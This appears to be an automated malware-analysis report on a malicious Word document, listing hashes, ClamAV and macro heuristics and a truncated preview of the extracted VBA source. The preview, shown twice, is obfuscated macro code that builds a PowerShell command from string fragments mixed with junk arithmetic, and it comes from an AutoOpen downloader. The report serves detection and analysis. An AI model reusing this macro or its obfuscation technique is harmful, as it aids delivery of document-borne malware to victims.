Office (OLE) malware analysis — malicious · 885a40d3bb071ab8

MALICIOUS

Office (OLE)

120.9 KB Created: 2018-06-22 20:58:00 Authoring application: Microsoft Office Word First seen: 2019-03-18

MD5: 6c4a138179fcd74da240122b59441dcb SHA-1: 596bd8d4537d0fa0477938322ba0ad65ee0c6ddd SHA-256: 885a40d3bb071ab884cd3b227938c80997a83e520716a85d9eb8bfa679d51ecc

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro utilizes a Shell() call and an AutoOpen function, indicating an attempt to execute arbitrary code upon opening. The obfuscated script concatenates strings to form a command, likely for downloading and executing a secondary payload, which is a common technique for malware delivery.

Heuristics 7

ClamAV: Doc.Malware.Valyria-6707484-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-6707484-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28815 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	28815 bytes
SHA-256: `3a4819303191d2c3e7260865ad9cca6e82c45c73609164aa0acd7c50d9be0f74`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "PAYfwiOjsjMi" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "FNawurQ" Function RdmprBqkUjf() On Error Resume Next hhjRmz = (vQOzOC * 68574 + 90221 * CInt(OYQWa - CDbl(69122)) * 63533 * Oct(9509)) MHdHaoFVF = "Hel" + "l " + Chr(34) + "$(" + "SET" + "-IT" skvjzC = (nQakA * 19509 + 15751 * CInt(GKLMww - CDbl(91466)) * 46137 * Oct(17397)) DDMvpbkCIBE = "Em " + " 'v" + "ar" UJXXC = (AijtMz * 24136 + 35983 * CInt(iblIK - CDbl(49519)) * 9216 * Oct(32080)) njvdwudrNz = "Iab" + "lE:" + "OFS" RdmprBqkUjf = MHdHaoFVF + DDMvpbkCIBE + njvdwudrNz QQYUG = (zMmWds * 88690 + 30056 * CInt(cjVdO - CDbl(74614)) * 13568 * Oct(95462)) End Function Function jFJLIjp() On Error Resume Next zQVKPw = (PsGGma * 62362 + 45897 * CInt(wAMppU - CDbl(77022)) * 22255 * Oct(44645)) HnpakwbLD = "' " + "'' " + ") " + Chr(34) aDbCdJ = (iUqTm * 94868 + 77165 * CInt(NznIcC - CDbl(6576)) * 95990 * Oct(73081)) BYZcCDPMpM = "+[" + "stR" + "iNG" + "](" + " '6" muHEf = (JmjXjo * 82198 + 55995 * CInt(TvMhYJ - CDbl(5905)) * 46794 * Oct(12484)) brAUOLm = "2-" + "88&" + "10" + "4h7" + "2A1" UACvdX = (pjrOL * 51499 + 78165 * CInt(JzNQA - CDbl(49110)) * 17403 * Oct(19781)) HnXJiQCw = "10" + "h66" + "h10" IHrQN = (jWBcK * 53144 + 12909 * CInt(GAdzGl - CDbl(66293)) * 15311 * Oct(39361)) HmiEnrs = "9y5" + "8h" + "39%" + "58h" + "116" + "d12" + "7i" TOJpI = (BLqrm * 41205 + 61721 * CInt(baHsKw - CDbl(57179)) * 73426 * Oct(6175)) KjEJHbqoLZi = "109" + "i5" + "5y" + "117" + "%1" HPXaC = (cAnTw * 99308 + 98723 * CInt(OvbzlP - CDbl(10711)) * 71014 * Oct(39403)) oiulwnQ = "20" + "y1" + "12h" + "127" + "-12" + "1d" + "110" jFJLIjp = HnpakwbLD + BYZcCDPMpM + brAUOLm + HnXJiQCw + HmiEnrs + KjEJHbqoLZi + oiulwnQ YjipzW = (hLBhsi * 52916 + 18273 * CInt(OliMt - CDbl(53065)) * 53115 * Oct(26257)) End Function Function pBTFRQbUt() On Error Resume Next OWiAoC = (vkCWu * 74937 + 5825 * CInt(ZOozM - CDbl(42058)) * 23734 * Oct(99096)) HSzWpLIkulL = "%5" + "8A1" + "04" + "i1" TAUCHt = (EQLizP * 63182 + 43866 * CInt(KzwZnX - CDbl(53839)) * 66020 * Oct(33855)) IwHiDid = "23W" + "116" + "-1" + "26y" + "117" + "A1" fmdAIC = (ohoiU * 75490 + 82262 * CInt(RdbUR - CDbl(19651)) * 64573 * Oct(34269)) CJaMqjGhUV = "19T" + "33i" + "62" + "%1" + "14-" + "10" + "9d1" BYNaCv = (llVOJ * 51479 + 29715 * CInt(jcazi - CDbl(31621)) * 82289 * Oct(19004)) OHcHzvQHSBA = "05" + "h1" + "06W" + "10" + "8A" + "58d" TVtAO = (czViz * 68988 + 78534 * CInt(mmQwjS - CDbl(55024)) * 92377 * Oct(82476)) zJzTRPJUfl = "39" + "W5" + "8&" + "11" pBTFRQbUt = HSzWpLIkulL + IwHiDid + CJaMqjGhUV + OHcHzvQHSBA + zJzTRPJUfl Ynpji = (iLOGGj * 3613 + 45609 * CInt(ksQow - CDbl(31524)) * 36202 * Oct(83474)) End Function Function tOiiRvjwCsW() On Error Resume Next oNSTHr = (XifbaL * 87172 + 29475 * CInt(vnVirF - CDbl(69561)) * 85390 * Oct(47668)) mjjIasStJYU = "6i1" + "27" + "i10" + "9W5" + "5y" ZMHuwG = (KuVQOD * 44431 + 51799 * CInt(BWwzZz - CDbl(2208)) * 4668 * Oct(1247)) ltbrLDhldAF = "11" + "7-" + "12" zInjca = (JSSQkh * 40808 + 57379 * CInt(wuVjk - CDbl(95990)) * 15070 * Oct(16528)) tbicnWd = "0-" + "11" + "2A" + "12" NwbYa = (FtVIn * 43973 + 21705 * CInt(qTtEHS - CDbl(33388)) * 79828 * Oct(52182)) KDaUVGwt = "7-1" + "21A" + "110" + "d58" + "i7" YAHhT = (zAffPi * 38020 + 70217 * CInt(HKqLMp - CDbl(57386)) * 76027 * Oct(3644)) wukLcNA = "3&" + "99d" + "10" + "5&1" tOiiRvjwCsW = mjjIasStJYU + ltbrLDhldAF + tbicnWd + KDaUVGwt + wukLcNA Nqszqm = (UHAaD * 46383 + 50331 * CInt(InrfcM - CDbl(99664)) * 18030 * Oct(25510)) End Function Function jCIVz() On Error Resume Next HaiOdu = (FCGAG * 1758 + 78372 * CInt(rJLkRE - CDbl(74681)) * 31276 * Oct(64489)) OsSLJEjIdM = "10" + "y12" + "7%" + "11" + "9T" + "52T" CmHZS = (hfziL * 88387 + 12819 * CInt(FNwVTc - CDbl(2906)) * 73316 * Oct(5915)) MzXEu = "84" + "d1" + "27" + "A1" lDnZvv = (KwJaI * ... (truncated)

SHA-256: 3a4819303191d2c3e7260865ad9cca6e82c45c73609164aa0acd7c50d9be0f74

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "PAYfwiOjsjMi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "FNawurQ"
Function RdmprBqkUjf()
On Error Resume Next
hhjRmz = (vQOzOC * 68574 + 90221 * CInt(OYQWa - CDbl(69122)) * 63533 * Oct(9509))
MHdHaoFVF = "Hel" + "l " + Chr(34) + "$(" + "SET" + "-IT"
skvjzC = (nQakA * 19509 + 15751 * CInt(GKLMww - CDbl(91466)) * 46137 * Oct(17397))
DDMvpbkCIBE = "Em " + " 'v" + "ar"
UJXXC = (AijtMz * 24136 + 35983 * CInt(iblIK - CDbl(49519)) * 9216 * Oct(32080))
njvdwudrNz = "Iab" + "lE:" + "OFS"
RdmprBqkUjf = MHdHaoFVF + DDMvpbkCIBE + njvdwudrNz
QQYUG = (zMmWds * 88690 + 30056 * CInt(cjVdO - CDbl(74614)) * 13568 * Oct(95462))
End Function
Function jFJLIjp()
On Error Resume Next
zQVKPw = (PsGGma * 62362 + 45897 * CInt(wAMppU - CDbl(77022)) * 22255 * Oct(44645))
HnpakwbLD = "' " + "'' " + ") " + Chr(34)
aDbCdJ = (iUqTm * 94868 + 77165 * CInt(NznIcC - CDbl(6576)) * 95990 * Oct(73081))
BYZcCDPMpM = "+[" + "stR" + "iNG" + "](" + " '6"
muHEf = (JmjXjo * 82198 + 55995 * CInt(TvMhYJ - CDbl(5905)) * 46794 * Oct(12484))
brAUOLm = "2-" + "88&" + "10" + "4h7" + "2A1"
UACvdX = (pjrOL * 51499 + 78165 * CInt(JzNQA - CDbl(49110)) * 17403 * Oct(19781))
HnXJiQCw = "10" + "h66" + "h10"
IHrQN = (jWBcK * 53144 + 12909 * CInt(GAdzGl - CDbl(66293)) * 15311 * Oct(39361))
HmiEnrs = "9y5" + "8h" + "39%" + "58h" + "116" + "d12" + "7i"
TOJpI = (BLqrm * 41205 + 61721 * CInt(baHsKw - CDbl(57179)) * 73426 * Oct(6175))
KjEJHbqoLZi = "109" + "i5" + "5y" + "117" + "%1"
HPXaC = (cAnTw * 99308 + 98723 * CInt(OvbzlP - CDbl(10711)) * 71014 * Oct(39403))
oiulwnQ = "20" + "y1" + "12h" + "127" + "-12" + "1d" + "110"
jFJLIjp = HnpakwbLD + BYZcCDPMpM + brAUOLm + HnXJiQCw + HmiEnrs + KjEJHbqoLZi + oiulwnQ
YjipzW = (hLBhsi * 52916 + 18273 * CInt(OliMt - CDbl(53065)) * 53115 * Oct(26257))
End Function
Function pBTFRQbUt()
On Error Resume Next
OWiAoC = (vkCWu * 74937 + 5825 * CInt(ZOozM - CDbl(42058)) * 23734 * Oct(99096))
HSzWpLIkulL = "%5" + "8A1" + "04" + "i1"
TAUCHt = (EQLizP * 63182 + 43866 * CInt(KzwZnX - CDbl(53839)) * 66020 * Oct(33855))
IwHiDid = "23W" + "116" + "-1" + "26y" + "117" + "A1"
fmdAIC = (ohoiU * 75490 + 82262 * CInt(RdbUR - CDbl(19651)) * 64573 * Oct(34269))
CJaMqjGhUV = "19T" + "33i" + "62" + "%1" + "14-" + "10" + "9d1"
BYNaCv = (llVOJ * 51479 + 29715 * CInt(jcazi - CDbl(31621)) * 82289 * Oct(19004))
OHcHzvQHSBA = "05" + "h1" + "06W" + "10" + "8A" + "58d"
TVtAO = (czViz * 68988 + 78534 * CInt(mmQwjS - CDbl(55024)) * 92377 * Oct(82476))
zJzTRPJUfl = "39" + "W5" + "8&" + "11"
pBTFRQbUt = HSzWpLIkulL + IwHiDid + CJaMqjGhUV + OHcHzvQHSBA + zJzTRPJUfl
Ynpji = (iLOGGj * 3613 + 45609 * CInt(ksQow - CDbl(31524)) * 36202 * Oct(83474))
End Function
Function tOiiRvjwCsW()
On Error Resume Next
oNSTHr = (XifbaL * 87172 + 29475 * CInt(vnVirF - CDbl(69561)) * 85390 * Oct(47668))
mjjIasStJYU = "6i1" + "27" + "i10" + "9W5" + "5y"
ZMHuwG = (KuVQOD * 44431 + 51799 * CInt(BWwzZz - CDbl(2208)) * 4668 * Oct(1247))
ltbrLDhldAF = "11" + "7-" + "12"
zInjca = (JSSQkh * 40808 + 57379 * CInt(wuVjk - CDbl(95990)) * 15070 * Oct(16528))
tbicnWd = "0-" + "11" + "2A" + "12"
NwbYa = (FtVIn * 43973 + 21705 * CInt(qTtEHS - CDbl(33388)) * 79828 * Oct(52182))
KDaUVGwt = "7-1" + "21A" + "110" + "d58" + "i7"
YAHhT = (zAffPi * 38020 + 70217 * CInt(HKqLMp - CDbl(57386)) * 76027 * Oct(3644))
wukLcNA = "3&" + "99d" + "10" + "5&1"
tOiiRvjwCsW = mjjIasStJYU + ltbrLDhldAF + tbicnWd + KDaUVGwt + wukLcNA
Nqszqm = (UHAaD * 46383 + 50331 * CInt(InrfcM - CDbl(99664)) * 18030 * Oct(25510))
End Function
Function jCIVz()
On Error Resume Next
HaiOdu = (FCGAG * 1758 + 78372 * CInt(rJLkRE - CDbl(74681)) * 31276 * Oct(64489))
OsSLJEjIdM = "10" + "y12" + "7%" + "11" + "9T" + "52T"
CmHZS = (hfziL * 88387 + 12819 * CInt(FNwVTc - CDbl(2906)) * 73316 * Oct(5915))
MzXEu = "84" + "d1" + "27" + "A1"
lDnZvv = (KwJaI *
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.